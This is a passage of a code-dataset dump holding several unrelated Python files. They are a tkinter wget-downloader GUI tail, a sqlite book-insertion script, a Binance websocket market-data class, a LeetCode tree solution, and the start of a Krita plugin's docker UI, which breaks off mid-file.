text=\"Ready\",\r\n bg=\"#E7E9EA\",\r\n fg=\"#20211A\",\r\n justify=\"center\",\r\n font=(\"Tahoma\", 11),\r\n )\r\n self.status_label.pack(fill=\"both\", expand=True, pady=(4, 0))\r\n self.progress_frame = tk.Frame(self, bg=\"#E7E9EA\")\r\n self.progress_bar = ttk.Progressbar(\r\n self.progress_frame, orient=tk.HORIZONTAL, length=200, mode=\"determinate\"\r\n )\r\n self.progress_label = tk.Label(\r\n self.progress_frame, text=\"0%\", bg=\"#E7E9EA\", fg=\"#20211A\"\r\n )\r\n self.progress_label.pack(side=tk.RIGHT)\r\n self.progress_bar.pack(fill=\"both\", expand=True, pady=(0, 4))\r\n self.progress_frame.pack(fill=\"both\", expand=True)\r\n\r\n def update_status(self, text):\r\n self.status_label.config(text=text)\r\n\r\n def update_progress(self, value):\r\n self.progress_bar[\"value\"] = value\r\n self.progress_label.config(text=f\"{int(value)}%\")\r\n\r\n\r\n# Add the custom status label with progress bar\r\nstatus_widget = StatusLabelWithProgressBar(window, text=\"Status\")\r\nstatus_widget.pack(fill=\"both\", expand=True, pady=(5, 20))\r\n\r\n# Watermark label\r\nwatermark_label = tk.Label(\r\n window, text=\"pudszTTIOT\", font=(\"Corbel\", 9), bg=\"#2A292B\", fg=\"#46F953\"\r\n)\r\nwatermark_label.place(relx=1.0, rely=1.0, anchor=\"se\", x=0, y=0)\r\n\r\n# Calculate the screen width and height\r\nscreen_width = window.winfo_screenwidth()\r\nscreen_height = window.winfo_screenheight()\r\n\r\n# Calculate the window position\r\nwindow_width = window.winfo_width()\r\nwindow_height = window.winfo_height()\r\nx = screen_width // 3 - window_width // 4\r\ny = screen_height // 24 - window_height // -3\r\n\r\n# Set the window position\r\nwindow.geometry(f\"+{x}+{y}\")\r\n\r\n# Background color\r\nwindow.configure(bg=\"#80b3ff\")\r\n\r\n# Run the main event 
loop\r\nwindow.mainloop()\r\n","repo_name":"pudszttiot/Wget-Downloader","sub_path":"v1.2/wgetdownloaderversion1.2.py","file_name":"wgetdownloaderversion1.2.py","file_ext":"py","file_size_in_byte":9869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"75035826509","text":"import sqlite3\n\n# Connect to the database\nconn = sqlite3.connect('biblioteca.db')\ncursor = conn.cursor()\n\n# Sample data\nlibros = [\n    (\"001\", \"El señor de los anillos\", 25.99, \"disponible\"),\n    (\"002\", \"Cien años de soledad\", 20.50, \"disponible\"),\n    (\"003\", \"1984\", 18.75, \"disponible\"),\n    (\"004\", \"Don Quijote de la Mancha\", 22.30, \"disponible\"),\n    (\"005\", \"Moby Dick\", 19.99, \"disponible\"),\n    (\"006\", \"Orgullo y prejuicio\", 16.45, \"disponible\"),\n    (\"007\", \"Crimen y castigo\", 21.20, \"disponible\"),\n    (\"008\", \"Las aventuras de Tom Sawyer\", 15.75, \"disponible\"),\n    (\"009\", \"La Odisea\", 23.40, \"disponible\"),\n    (\"010\", \"La metamorfosis\", 17.90, \"disponible\")\n]\n\n# Insert the books into the table\ncursor.executemany('''\n    INSERT INTO Libros (Código, Título, Precio_Reposición, Estado) \n    VALUES (?, ?, ?, ?)\n''', libros)\n\n# Save the changes and close the connection\nconn.commit()\nconn.close()\n\nprint(\"The books have been inserted into the Libros table.\")\n","repo_name":"TUTEX11/Trabajo-Practico-Integrador","sub_path":"Scripts de creacion de la DB/librosDB.py","file_name":"librosDB.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"2376469241","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Aug 19 12:05:51 2022\r\n\r\n@author: user\r\n\"\"\"\r\n\r\n\r\nfrom backtesting import Backtest, Strategy\r\nfrom backtesting.lib import crossover\r\nfrom binance.client import Client\r\nimport pandas as pd\r\nimport numpy as np\r\nimport json\r\nimport ta\r\nfrom decouple import config\r\nimport time\r\nimport orjson\r\nimport websocket\r\nfrom threading import Thread\r\nfrom datetime import datetime\r\nfrom traceback import format_exc\r\n\r\napi_key = config(\"API_KEY\") # these are testnet keys\r\nsecret_key = config(\"SECRET_KEY\") # these are testnet keys\r\n\r\n# THE WS Class Code was assisted with the help of my great friend Georgie who helped me understand \r\n# the Binance Websocket API Ingestion procedures and dictionary mappings. \r\n\r\nclass WS(Thread):\r\n    def __init__(self, symbols: list, timeframes: list, use_testnet=False):\r\n        '''\r\n        Opens Binance WS klines stream for multiple symbols and timeframes.\r\n        Valid timeframes: 1s, 1m, 3m, 5m, 15m, 30m, 1h, 2h, 4h, 6h, 8h, 12h, 1d, 3d, 1w, 1M\r\n        Streams format: <symbol>@kline_<interval>\r\n        Ref: https://binance-docs.github.io/apidocs/spot/en/#kline-candlestick-streams\r\n        \r\n        Args:\r\n            symbols: List of symbols to get data for\r\n            timeframes: List of timeframes to get data in\r\n            use_testnet: Use testnet data\r\n        \r\n        Attributes:\r\n            data: Dict where candles data for each symbol and timeframe is stored.\r\n                Each key of data is a symbol and the value is a dict where each key is a timeframe.\r\n                Each timeframe value is a dict where keys are UNIX timestamps of the candles and\r\n                values are lists of open, high, low, close, volume. 
The current candle is constantly updated.\r\n                Example structure:\r\n                {\r\n                    'BTCUSDT': {\r\n                        '1m': {\r\n                            1662556860000: [18849.36, 18855.11, 18841.22, 18849.5, 142.32401]\r\n                            1662556870000: [18849.36, 18855.11, 18841.22, 18849.5, 142.32401]\r\n                        }\r\n                    }, \r\n                    'ETHUSDT': {\r\n                        '1m': {\r\n                            1662556860000: [1535.98, 1536.44, 1534.33, 1536.43, 932.4534]\r\n                            1662556870000: [1535.98, 1536.44, 1534.33, 1536.43, 932.4534]\r\n                        }\r\n                    }\r\n                }\r\n        '''\r\n        super().__init__()\r\n        \r\n        self.ws = None\r\n        if use_testnet:\r\n            self.ws_url = 'wss://testnet.binance.vision/stream?streams='\r\n        else:\r\n            self.ws_url = 'wss://stream.binance.com:9443/stream?streams='\r\n        \r\n        self.data = {}\r\n        self.streams = []\r\n        for symbol in symbols:\r\n            self.data[symbol] = {}\r\n            for timeframe in timeframes:\r\n                self.ws_url += f'{symbol.lower()}@kline_{timeframe.lower()}/'\r\n                self.data[symbol][timeframe] = {}\r\n        self.ws_url = self.ws_url.rstrip('/')\r\n        \r\n        self.connected = False\r\n        self.daemon = True # If set to True the thread will not block execution.\r\n        \r\n    def log(self, msg, level='INFO'):\r\n        print(f'{datetime.now()} [{level.upper()}] {msg}')\r\n    \r\n    def connect(self):\r\n        self.ws = websocket.WebSocketApp(\r\n            url=self.ws_url,\r\n            on_message=self.on_message,\r\n            on_close=self.on_close,\r\n            on_error=self.on_error\r\n        )\r\n        self.connected = True\r\n    \r\n    def reconnect(self):\r\n        del self.ws\r\n        self.ws = None\r\n        self.connect()\r\n    \r\n    def start_stream(self):\r\n        self.ws.run_forever()\r\n    \r\n    def on_message(self, ws, msg):\r\n        '''\r\n        Receives a WS message and saves the data in self.data\r\n        Kline message format:\r\n        {\r\n            \"stream\": \"ethusdt@kline_1m\",\r\n            data: {\r\n                \"e\": \"kline\", // Event type\r\n                \"E\": 123456789, // Event time\r\n                \"s\": \"BNBBTC\", // Symbol\r\n                \"k\": {\r\n                    \"t\": 123400000, // Kline start time\r\n                    \"T\": 123460000, // Kline close time\r\n                    \"s\": \"ETHUSDT\", // Symbol\r\n                    \"i\": \"1m\", // Interval\r\n                    \"f\": 100, // First trade ID\r\n                    \"L\": 200, // Last trade ID\r\n                    \"o\": \"0.0010\", // Open price\r\n                    \"c\": \"0.0020\", // Close price\r\n                    \"h\": \"0.0025\", // High price\r\n                    \"l\": \"0.0015\", // Low price\r\n                    \"v\": \"1000\", // Base asset volume\r\n                    \"n\": 100, // Number of trades\r\n                    \"x\": false, // Is this kline closed?\r\n                    \"q\": \"1.0000\", // Quote asset volume\r\n                    \"V\": \"500\", // Taker buy base asset volume\r\n                    \"Q\": \"0.500\", // Taker buy quote asset volume\r\n                    \"B\": \"123456\" // Ignore\r\n                }\r\n            }\r\n        }\r\n        '''\r\n        msg = orjson.loads(msg)\r\n        # here I'm literally just parsing the data given I have a ws stream in the proper format.\r\n        if 'stream' in msg and 'kline' in msg['stream']:\r\n            symbol = msg['data']['s']\r\n            timeframe = msg['stream'].split('_')[1]\r\n            kline = msg['data']['k']\r\n            # setting the value to open, high, low, close, volume from the kline dictionary\r\n            self.data[symbol][timeframe][kline['t']] = [float(kline['o']), float(kline['h']), float(kline['l']), float(kline['c']), float(kline['v'])]\r\n        else:\r\n            self.log(f'WS message not kline: {msg}')\r\n\r\n    def on_error(self, ws, error):\r\n        self.log(error)\r\n\r\n    def on_close(self, ws, close_status_code=None, close_msg=None):\r\n        # websocket-client >= 1.0 passes (ws, status code, message) to this callback\r\n        self.log('WS connection closing', 'WARNING')\r\n        self.connected = False\r\n\r\n    def get_candles(self, symbol, timeframe):\r\n        if not self.data[symbol.upper()][timeframe]:\r\n            return pd.DataFrame(columns=['Time','Open', 'High', 'Low', 'Close', 'Volume'])\r\n        df = pd.DataFrame(self.data[symbol.upper()][timeframe]).transpose()\r\n        df.columns = ['Open', 'High', 'Low', 'Close', 'Volume']\r\n        df.index = 
pd.to_datetime(df.index, unit='ms')\r\n        df['Time'] = df.index\r\n        return df\r\n\r\n    def run(self):\r\n        while True:\r\n            try:\r\n                self.log('Starting stream')\r\n                self.connect()\r\n                self.start_stream()\r\n            except Exception:\r\n                self.log(format_exc(), 'error')\r\n                del self.ws\r\n                self.ws = None\r\n                time.sleep(1)\r\n\r\n\r\nclass BinanceData:\r\n    \r\n    \r\n    client = Client() # historical prices. Force a decision to API TESTNET or Live\r\n    \r\n    \r\n    @classmethod\r\n    def client_live(cls, api_live, api_secret_live):\r\n        \r\n        \"\"\"In case you need to switch to different keys\r\n        \r\n        Feed your real api and secret keys for Live Trading.\"\"\"\r\n        \r\n        cls.client = Client(api_live, api_secret_live)\r\n    \r\n    @classmethod\r\n    def client_testnet(cls, api, api_secret):\r\n        \"\"\"Use testnet.binance.vision\r\n        \r\n        US users: pass tld = 'us'.\r\n        \r\n        \"\"\"\r\n        cls.client = Client(api, api_secret, testnet = True) \r\n    \r\n    def dataprocess(self, frame):\r\n        # just slicing the columns we want\r\n        frame = frame.iloc[:, :6]\r\n        frame.columns = ['Time', 'Open', 'High', 'Low', 'Close', 'Volume'] \r\n        frame = frame.set_index('Time') \r\n        frame = frame.astype(float)\r\n        frame.index = pd.to_datetime(frame.index, unit = 'ms')\r\n        # frame['Ticker'] = self.symbol + 'USDT'\r\n        return frame\r\n\r\n    # NOTE can definitely merge these data gathering functions\r\n    def getdailydata(self, symbol: str, baseasset: str , start:str):\r\n        \"\"\"Pulling Binance API data\r\n        \r\n        symbol = Ticker \r\n        baseasset = base asset of choice (often USDT)\r\n        You just need to add the symbol \r\n        \r\n        \"\"\"\r\n        frame = pd.DataFrame(self.client.get_historical_klines(symbol + baseasset , '1d', start))\r\n        return self.dataprocess(frame)\r\n\r\n    def gethourdata(self, symbol:str , baseasset:str, lookback:str):\r\n        \r\n        \"\"\"This is a way to get hour data:\r\n        \r\n        symbol = ticker\r\n        lookback = how many hours back to sample\r\n        \"\"\"\r\n        if isinstance(lookback, int): \r\n            lookback = str(lookback)\r\n        \r\n        frame = pd.DataFrame(self.client.get_historical_klines(symbol + baseasset, '1h', lookback + 'hour ago UTC')) # lookback must be a string, otherwise the concatenation raises a TypeError\r\n        return self.dataprocess(frame)\r\n    \r\n    def getminutedata(self, symbol:str, baseasset:str, lookback: str):\r\n        \r\n        if isinstance(lookback, int):\r\n            lookback = str(lookback)\r\n        \r\n        frame = pd.DataFrame(self.client.get_historical_klines(symbol + baseasset, '1m', lookback + 'min ago UTC'))\r\n        return self.dataprocess(frame)\r\n    \r\n    \r\n    def websocket(self, symbols: list, timeframes: list, use_testnet: bool = False):\r\n        \r\n        \"\"\"\r\n        \r\n        This method creates an instance of the WS class that handles the websocket data stream for multiple symbols and timeframes.\r\n        Args:\r\n            symbols: List of symbols to get data for, e.g. ['BTCUSDT', 'ETHUSDT']\r\n            timeframes: List of timeframes to get data for, e.g. ['30m', '1h']\r\n            use_testnet: If set to True the data source will be Binance Testnet\r\n        \r\n        Notes:\r\n            1. Websocket data is streaming, i.e. we don't get any historical data from it.\r\n            2. To get the candles dataframe use the get_websocket_candles() method.\r\n            3. Call websocket only once on initialization.\r\n        \"\"\"\r\n        self.ws = WS(symbols=symbols, timeframes=timeframes, use_testnet=use_testnet)\r\n        self.ws.start()\r\n    \r\n    \r\n    def get_websocket_candles(self, symbol: str, timeframe: str):\r\n        '''\r\n        Get candles data collected by the websocket object.\r\n        Returns a Pandas DataFrame in the same format as the getminutedata, gethourdata and getdailydata methods.\r\n        Args:\r\n            symbol: The symbol to get data for. 
Must be one of the symbols passed to the websocket() method.\r\n            timeframe: The timeframe to get data for. Must be one of the timeframes passed to the websocket() method.\r\n        '''\r\n        return self.ws.get_candles(symbol=symbol, timeframe=timeframe)\r\n\r\n\r\n# if __name__ == '__main__':\r\n    # Test daily data\r\n    # bin_trade = BinanceData()\r\n    # bin_trade.getdailydata('BTC', 'USDT' , '2019-01-01')\r\n\r\n    # Test websocket data ==> Georgi These Need now to go to BUSD\r\n    # bin_trade = BinanceData()\r\n    # bin_trade.websocket(symbols=['BTCBUSD', 'ETHBUSD'], timeframes=['1m'])\r\n\r\n    # As the WS data collector is running on its separate thread in parallel we can have a loop in which we periodically fetch the collected data and print it.\r\n    # while True:\r\n        # print(bin_trade.get_websocket_candles('BTCBUSD', '1m'))\r\n        # print(bin_trade.get_websocket_candles('ETHBUSD', '1m'))\r\n        # time.sleep(5)\r\n","repo_name":"brymar86/TradingStrategies","sub_path":"BinanceData.py","file_name":"BinanceData.py","file_ext":"py","file_size_in_byte":11336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"39706521908","text":"# https://leetcode.com/problems/leaf-similar-trees/?envType=study-plan-v2&envId=leetcode-75\nfrom USEFUL_CODES.LC import *\n\n\nclass Solution:\n    def leafSimilar(self, root1: Optional[TreeNode], root2: Optional[TreeNode]) -> bool:\n        def dfs(root: TreeNode) -> str:\n            if not root.left and not root.right:\n                return f\"{root.val},\"\n            ans = \"\"\n            if root.left:\n                ans += dfs(root.left)\n            if root.right:\n                ans += dfs(root.right)\n            return ans\n\n        return dfs(root1) == dfs(root2)\n\n\nS = Solution()\nt1 = create_tree([3, 5, 1, 6, 2, 9, 8, null, null, 7, 4])\nt2 = create_tree([3, 5, 1, 6, 7, 4, 2, null, null, null, null, null, null, 9, 8])\nX = S.leafSimilar(t1, t2)\nprint(X)\n","repo_name":"FAdy-200/problem_solving","sub_path":"leetcode/872.py","file_name":"872.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"32438233365","text":"import sys, math, threading\nfrom krita import *\n\nfrom PyQt5.QtCore import Qt, QThreadPool\nimport os\nfrom os import path\nfrom functools import partial\nfrom types import SimpleNamespace\nfrom PyQt5.QtWidgets import (\n    QPushButton,\n    QStatusBar,\n    QLabel,\n    QLineEdit,\n    QHBoxLayout,\n    QVBoxLayout,\n    QGroupBox,\n    QWidget,\n    QSpinBox,\n    QFrame,\n    QScrollArea\n)\nfrom .navigateWidget import NavigateWidget\nfrom .blenderLayerServer import BlenderLayerServer, BlenderRunnable\n\ninstance = Krita.instance()\n \nclass BlenderLayer(DockWidget):\n\n    def __init__(self):\n        super().__init__()\n        \n        instance.notifier().windowCreated.connect(self.createActions)\n\n        self.settings = SimpleNamespace()\n        self.settings.transparency = True\n        self.settings.gizmos = False\n        self.settings.scale = 0\n        self.settings.framerateScale = 0\n        self.settings.region = False\n        self.settings.regionViewport = True\n        self.settings.renderCurrentView = False\n        self.settings.lensZoom = True\n        self.settings.engine = ''\n        self.settings.shading = 1\n\n        self.readSettings()\n        self.createdActions = False\n        self.lastStatus = None\n        self.blenderRunning = False\n        self.connected = False\n        self.server = None\n        self.activeInFile = None\n        self.activeDocument = None\n        self.blockServerSignal = False\n        self.setWindowTitle(i18n(\"Blender Layer\"))\n\n        scrollContainer = QWidget()\n        scroll = QScrollArea()\n        scroll.setWidget(scrollContainer)\n        scroll.setWidgetResizable(True)\n        
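# A minimal sketch (assumption, not the original implementation) of what readSettings()\n        # and writeSettings() above presumably wrap -- Krita's per-plugin settings API, which\n        # stores strings per group/name (the 'blenderLayer' group name here is hypothetical):\n        #   self.settings.blenderPath = instance.readSetting('blenderLayer', 'blenderPath', '')\n        #   instance.writeSetting('blenderLayer', 'blenderPath', self.settings.blenderPath)\n        # Non-string fields (port, library, ...) would need e.g. a json.dumps/json.loads round trip.\n        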
scroll.setFrameShape(QFrame.NoFrame)\n scroll.setFrameShadow(QFrame.Plain)\n scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\n\n updateProgress = QProgressBar()\n updateProgress.hide()\n \n settingsHBoxLayout = QHBoxLayout()\n settingsHBoxLayout.addStretch()\n settingsButton = QPushButton()\n settingsButton.setIcon(instance.icon('configure-thicker'))\n settingsButton.setToolTip(i18n(\"Settings\"))\n settingsHBoxLayout.addWidget(settingsButton)\n \n connectionGroupBox = QGroupBox(i18n(\"Connect\"))\n connectionVBoxLayout = QVBoxLayout()\n connectionHBoxLayout = QHBoxLayout()\n startstopButton = QPushButton(i18n(\"Start Server\"))\n startstopButton.setToolTip(i18n(\"Start/Stop the server.\\nYou'll have to connect Blender manually via the companion plugin\\n(In Blender View → Connect to Krita)\"))\n startBlenderButton = QPushButton(i18n(\"Start Blender\"))\n startBlenderButton.setToolTip(i18n(\"Start Blender and connect automagically\"))\n statusBar = QLabel()\n statusBar.setWordWrap(True)\n\n connectionHBoxLayout.addWidget(startBlenderButton)\n connectionHBoxLayout.addWidget(startstopButton)\n connectionVBoxLayout.addLayout(connectionHBoxLayout)\n connectionVBoxLayout.addWidget(statusBar)\n connectionVBoxLayout.addWidget(updateProgress)\n connectionGroupBox.setLayout(connectionVBoxLayout)\n\n viewHBoxLayout = QHBoxLayout()\n viewLabel = QLabel(i18n(\"Mode\")) \n viewComboBox = QComboBox()\n viewComboBox.addItems([i18n(\"Current view\"), i18n(\"Camera\"), i18n(\"Render result\")])\n viewComboBox.setItemData(0, i18n(\"Show view as seen in the active 3D View\"), QtCore.Qt.ToolTipRole)\n viewComboBox.setItemData(1, i18n(\"Show view from the active camera\"), QtCore.Qt.ToolTipRole)\n viewComboBox.setItemData(2, i18n(\"Render and show result\"), QtCore.Qt.ToolTipRole)\n viewComboBox.setToolTip(i18n(\"Select view mode\"))\n\n viewHBoxLayout.addWidget(viewLabel)\n viewHBoxLayout.addWidget(viewComboBox)\n \n renderGroupBox = QGroupBox(i18n(\"Render\"))\n renderVBoxLayout = QVBoxLayout()\n \n renderCurrentViewCheck = QCheckBox(i18n(\"Render from current view\"))\n renderCurrentViewCheck.setToolTip(i18n(\"When disabled, the active camera will be used\"))\n renderOverrideCheck = QCheckBox(i18n(\"Override render settings\"))\n renderOverrideCheck.setChecked(True)\n renderOverrideCheck.setToolTip(i18n(\"Override some of the settings in the .blend file\"))\n\n renderOverrideVBoxLayout = QVBoxLayout()\n\n renderPathCheck = QCheckBox(i18n(\"Override path\"))\n renderPathCheck.setChecked(True)\n renderPathCheck.setToolTip(i18n(\"Use the path specified in settings\"))\n renderResCheck = QCheckBox(i18n(\"Override resolution\"))\n renderResCheck.setChecked(True)\n renderResCheck.setToolTip(i18n(\"Adjust output size to the current document\"))\n renderTransparencyCheck = QCheckBox(i18n(\"Transparent background\"))\n renderTransparencyCheck.setChecked(True)\n renderTransparencyCheck.setToolTip(i18n(\"Render with transparency\"))\n renderTemporaryCheck = QCheckBox(i18n(\"Only apply temporarily\"))\n renderTemporaryCheck.setChecked(True)\n renderTemporaryCheck.setToolTip(i18n(\"Settings will be reverted once the render is done\"))\n \n renderOverrideVBoxLayout.addWidget(renderPathCheck)\n renderOverrideVBoxLayout.addWidget(renderResCheck)\n renderOverrideVBoxLayout.addWidget(renderTransparencyCheck)\n renderOverrideVBoxLayout.addWidget(renderTemporaryCheck)\n\n line0 = QFrame()\n line0.setFrameShape(QFrame.HLine)\n line0.setFrameShadow(QFrame.Sunken)\n \n renderHBoxLayout = QHBoxLayout()\n renderButton = 
QPushButton(i18n(\"Render\"))\n renderButton.setToolTip(i18n(\"Start a render\"))\n renderAnimationButton = QPushButton(i18n(\"Render Animation\"))\n renderAnimationButton.setToolTip(i18n(\"Render mulitple frames and import them as an animation\"))\n\n renderHBoxLayout.addWidget(renderButton)\n renderHBoxLayout.addWidget(renderAnimationButton)\n \n renderVBoxLayout.addWidget(renderCurrentViewCheck)\n renderVBoxLayout.addWidget(renderOverrideCheck)\n renderVBoxLayout.addLayout(renderOverrideVBoxLayout)\n renderVBoxLayout.addWidget(line0)\n renderVBoxLayout.addLayout(renderHBoxLayout)\n renderGroupBox.setLayout(renderVBoxLayout)\n \n viewGroupBox = QGroupBox(i18n(\"View\"))\n viewVBoxLayout = QVBoxLayout()\n currentViewVBoxLayout = QVBoxLayout()\n navigateWidget = NavigateWidget()\n viewGrid = QGridLayout()\n\n rollLabel = QLabel(i18n(\"Roll\")) \n rollSlider = QSlider(Qt.Horizontal)\n rollSlider.setRange(-1800, 1800)\n rollSpinBox = QDoubleSpinBox()\n rollSpinBox.setRange(-180, 180)\n rollSpinBox.setSuffix(i18n(\"°\"))\n rollSlider.valueChanged.connect(partial(self.changeSpinBox,rollSpinBox))\n rollSpinBox.valueChanged.connect(partial(self.changeSlider,rollSlider))\n \n lensLabel = QLabel(i18n(\"Focal Length\")) \n lensSlider = QSlider(Qt.Horizontal)\n lensSlider.setRange(10, 2500)\n lensSlider.setValue(500)\n lensSpinBox = QDoubleSpinBox()\n lensSpinBox.setRange(1, 250)\n lensSpinBox.setSuffix(i18n(\" mm\"))\n lensSpinBox.setValue(50)\n lensSlider.valueChanged.connect(partial(self.changeSpinBox,lensSpinBox))\n lensSpinBox.valueChanged.connect(partial(self.changeSlider,lensSlider))\n\n viewGrid.addWidget(rollLabel, 0, 0)\n viewGrid.addWidget(rollSlider, 0, 1)\n viewGrid.addWidget(rollSpinBox, 0, 2)\n\n viewGrid.addWidget(lensLabel, 1, 0)\n viewGrid.addWidget(lensSlider, 1, 1)\n viewGrid.addWidget(lensSpinBox, 1, 2)\n\n lensZoomCheck = QCheckBox(i18n(\"Adjust zoom to focal length\"))\n lensZoomCheck.setChecked(True)\n lensZoomCheck.setToolTip(i18n(\"Adjust camera zoom such that when changing the focal length\\nan object in the center approximately stays the same size\"))\n\n line1 = QFrame()\n line1.setFrameShape(QFrame.HLine)\n line1.setFrameShadow(QFrame.Sunken)\n \n cyclesWarning = QLabel(''+i18n(\"Cycles is only supported in render result mode\") + '')\n cyclesWarning.setWordWrap(True)\n cyclesWarning.hide()\n \n transparentCheck = QCheckBox(i18n(\"Transparent background\"))\n transparentCheck.setChecked(True)\n transparentCheck.setToolTip(i18n(\"Use transparency.\\nSupported starting with Blender 3.6.0\"))\n\n gizmoCheck = QCheckBox(i18n(\"Show gizmos\"))\n gizmoCheck.setToolTip(i18n(\"Whether to show gizmos.\\nDepends on the settings of the active 3D View\"))\n\n shadingComboBox = QComboBox()\n shadingComboBox.addItems([i18n(\"Wireframe\"), i18n(\"Solid\"), i18n(\"Material Preview\"), i18n(\"Rendered\")])\n shadingComboBox.setCurrentIndex(1)\n\n viewFormLayout = QFormLayout()\n viewFormLayout.addRow(i18n(\"Viewport shadig:\"), shadingComboBox)\n viewFormLayout.addRow(transparentCheck)\n viewFormLayout.addRow(gizmoCheck)\n \n manualWarning = QLabel('' + i18n(\"Currently in manual mode, changes will become visible after pressing the update button\") + '')\n manualWarning.setWordWrap(True)\n manualWarning.hide()\n \n line2 = QFrame()\n line2.setFrameShape(QFrame.HLine)\n line2.setFrameShadow(QFrame.Sunken)\n \n assistantsButton = QPushButton(i18n(\"Create Assistant Set\"))\n assistantsButton.setToolTip(i18n(\"Create drawing assistants matching the current view.\\nThis will create an xml 
file which has to be loaded from the tool settings of the assistants tool.\\n(Tool Settings → Load Assistant Set Button)\"))\n\n currentViewVBoxLayout.addWidget(navigateWidget)\n currentViewVBoxLayout.addLayout(viewGrid)\n currentViewVBoxLayout.addWidget(lensZoomCheck)\n currentViewVBoxLayout.addWidget(line1)\n viewVBoxLayout.addLayout(currentViewVBoxLayout)\n viewVBoxLayout.addWidget(cyclesWarning)\n viewVBoxLayout.addLayout(viewFormLayout)\n viewVBoxLayout.addWidget(manualWarning)\n viewVBoxLayout.addWidget(line2)\n viewVBoxLayout.addWidget(assistantsButton)\n viewGroupBox.setLayout(viewVBoxLayout)\n\n updateHBoxLayout = QHBoxLayout()\n updateLabel = QLabel(i18n(\"Update mode\")) \n updateComboBox = QComboBox()\n updateComboBox.addItems([i18n(\"Live\"), i18n(\"Auto\"), i18n(\"Manual\")])\n updateComboBox.setCurrentIndex(1)\n updateComboBox.setItemData(0, i18n(\"Periodically update even when Krita is not in focus\"), QtCore.Qt.ToolTipRole)\n updateComboBox.setItemData(1, i18n(\"Only update when settings change or Krita regains focus\\n(Recommended)\"), QtCore.Qt.ToolTipRole)\n updateComboBox.setItemData(2, i18n(\"Only update when the update button is pressed\\n(Recommended for large resolutions)\"), QtCore.Qt.ToolTipRole)\n updateComboBox.setToolTip(i18n(\"Select when to update the view\"))\n \n updateHBoxLayout.addWidget(updateLabel)\n updateHBoxLayout.addWidget(updateComboBox)\n\n updateGroupBox = QGroupBox(i18n(\"Update\"))\n updateVBoxLayout = QVBoxLayout()\n \n updateForm = QFormLayout()\n updateRateLabel = QLabel(i18n(\"Update\")) \n updateRateComboBox = QComboBox()\n updateRateComboBox.addItems([i18n(\"Every frame\"), i18n(\"Every 4th frame\"), i18n(\"Every 16th frame\"), i18n(\"Every 64th frame\")])\n \n updateResLabel = QLabel(i18n(\"Resolution\")) \n updateResComboBox = QComboBox()\n updateResComboBox.addItems([i18n(\"Full\"), i18n(\"Half\"), i18n(\"Quarter\"), i18n(\"Eighth\")])\n \n #updateForm.addRow(updateRateLabel, updateRateComboBox)\n updateForm.addRow(updateResLabel, updateResComboBox)\n\n line3 = QFrame()\n line3.setFrameShape(QFrame.HLine)\n line3.setFrameShadow(QFrame.Sunken)\n \n updateButtonsHBoxLayout = QHBoxLayout()\n updateButton = QPushButton(i18n(\"Update\")) \n updateButton.setToolTip(i18n(\"Update frame\"))\n updateAnimButton = QPushButton(i18n(\"Update Animation\"))\n updateAnimButton.setToolTip(i18n(\"Update multiple frames and import them as an animation\"))\n\n updateButtonsHBoxLayout.addWidget(updateButton)\n updateButtonsHBoxLayout.addWidget(updateAnimButton)\n\n updateVBoxLayout.addLayout(updateForm)\n updateVBoxLayout.addWidget(line3)\n updateVBoxLayout.addLayout(updateButtonsHBoxLayout)\n updateGroupBox.setLayout(updateVBoxLayout)\n\n regionCheck = QCheckBox(i18n(\"Limit image region\"))\n regionCheck.setToolTip(i18n(\"Limit the frame to a sub-region of the image\"))\n regionGroupBox = QGroupBox(i18n(\"Image Region\"))\n regionGroupBox.hide()\n regionVBoxLayout = QVBoxLayout()\n \n regionXSpinBox = QSpinBox()\n regionXSpinBox.setSuffix(i18n(\" px\"))\n regionYSpinBox = QSpinBox()\n regionYSpinBox.setSuffix(i18n(\" px\"))\n regionWidthSpinBox = QSpinBox()\n regionWidthSpinBox.setSuffix(i18n(\" px\"))\n regionHeightSpinBox = QSpinBox()\n regionHeightSpinBox.setSuffix(i18n(\" px\"))\n \n regionFormLayout = QFormLayout()\n regionFormLayout.addRow(i18n(\"X:\"), regionXSpinBox)\n regionFormLayout.addRow(i18n(\"Y:\"), regionYSpinBox)\n regionFormLayout.addRow(i18n(\"width:\"), regionWidthSpinBox)\n regionFormLayout.addRow(i18n(\"height:\"), 
regionHeightSpinBox)\n\n regionViewportCheck = QCheckBox(i18n(\"Fixed Viewport\"))\n regionViewportCheck.setChecked(True)\n regionViewportCheck.setToolTip(i18n(\"Crop the frame instead of adjusting the viewport\"))\n\n regionSelectionButton = QPushButton()\n regionSelectionButton.setIcon(instance.icon('tool_rect_selection'))\n regionSelectionButton.setToolTip(i18n(\"Set to current selection\"))\n\n regionHBoxLayout = QHBoxLayout()\n regionHBoxLayout.addWidget(regionViewportCheck)\n regionHBoxLayout.addStretch()\n regionHBoxLayout.addWidget(regionSelectionButton)\n \n regionVBoxLayout.addLayout(regionFormLayout)\n regionVBoxLayout.addLayout(regionHBoxLayout)\n regionGroupBox.setLayout(regionVBoxLayout)\n\n libraryGroupBox = QGroupBox(i18n(\"Library\"))\n libraryVBoxLayout = QVBoxLayout()\n libraryVBoxLayout.setContentsMargins(0, 0, 0, 0)\n\n libraryFormLayout = QFormLayout()\n libraryFormLayout.setContentsMargins(11, 11, 11, 11)\n \n libraryComboBox = QComboBox()\n libraryComboBox.addItems([i18n(\"\")])\n libraryComboBox.setMinimumWidth(100)\n\n libraryAppendButton = QToolButton()\n libraryAppendButton.setIcon(instance.icon('addlayer'))\n libraryAppendButton.setToolTip(i18n(\"Add object to the current scene\"))\n \n libraryHBoxLayout = QHBoxLayout()\n libraryHBoxLayout.addWidget(libraryComboBox)\n libraryHBoxLayout.addWidget(libraryAppendButton)\n\n line4 = QFrame()\n line4.setFrameShape(QFrame.HLine)\n line4.setFrameShadow(QFrame.Sunken)\n \n poseLabel = QLabel(i18n(\"Apply to:\"))\n \n poseComboBox = QComboBox()\n poseComboBox.addItems([i18n(\"\")])\n poseComboBox.setMinimumWidth(100)\n poseComboBox.setToolTip(i18n(\"The armature which the pose will be 